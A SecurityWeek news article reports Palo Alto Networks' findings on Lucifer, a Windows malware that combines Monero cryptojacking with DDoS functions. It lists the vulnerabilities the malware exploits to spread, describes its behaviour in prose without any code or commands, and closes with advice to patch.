Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Hybrid Malware ‘Lucifer’ Includes Cryptojacking, DDoS Capabilities

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.

Dubbed Lucifer, the malware was first observed on May 29, as part of a campaign that is still ongoing, but which switched to an upgraded variant on June 11.

The threat was designed to drop XMRig for mining Monero, it can propagate on its own by targeting various vulnerabilities, is capable of command and control (C&C) operations, and drops and runs EternalBlue, EternalRomance, and the DoublePulsar backdoor on vulnerable targets for intranet infections.

Lucifer, Palo Alto Networks security researchers reveal, targets a long list of critical and high-severity vulnerabilities, in software such as Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel, and Windows.

Targeted security flaws are CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Successful exploitation of these bugs provides attackers with the ability to execute code on the target machines. Although software updates to address these issues have been available for some time, many systems remain unpatched and exposed to attacks.

The malware contains three resource sections, each containing a binary for a specific purpose: x86 and x64 UPX-packed versions of XMRig 5.5.0, and Equation Group exploits (EternalBlue and EternalRomance, and the DoublePulsar backdoor implant).

Once it has infected a machine, Lucifer proceeds to gain persistence by setting specific registry key values. The malware enables itself with debug privilege and begins operation by launching several threads.

Advertisement. Scroll to continue reading.

For propagation, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL) and attempts to gain access by trying commonly used credentials, uses Equation Group exploits, or uses HTTP requests to probe for external, exposed systems. The payloads delivered to the identified vulnerable systems fetch a replica of the malware via certutil.

After all worker threads are launched, the malware enters an infinite loop to handle C&C operation. Based on commands received from the server, it can launch TCP/UDP/HTTP DoS attacks, download and execute files, execute commands, enable/disable the miner’s status report functionality, enable flags related to the miner, or reset the flags and terminate the miner.

The Stratum protocol on port 10001 is used for communication between the cryptojacking bot and its mining server.

The upgraded version of the malware has the same capabilities and behavior as its predecessor, but also includes an anti-sandbox capability by checking the username and the computer name of the infected host against a predefined list, as well as for the presence of specific device drivers, DLLs and virtual devices, and halting operation if a match is found. It also includes anti-debugger capabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software [is] strongly advised,” Palo Alto Networks concludes.

Related: ‘Graboid’ Crypto-Jacking Worm Targets Docker Hosts

Related: Interpol Announces Successful Operation Against Cryptojacking in Southeast Asia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cybercrime

Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.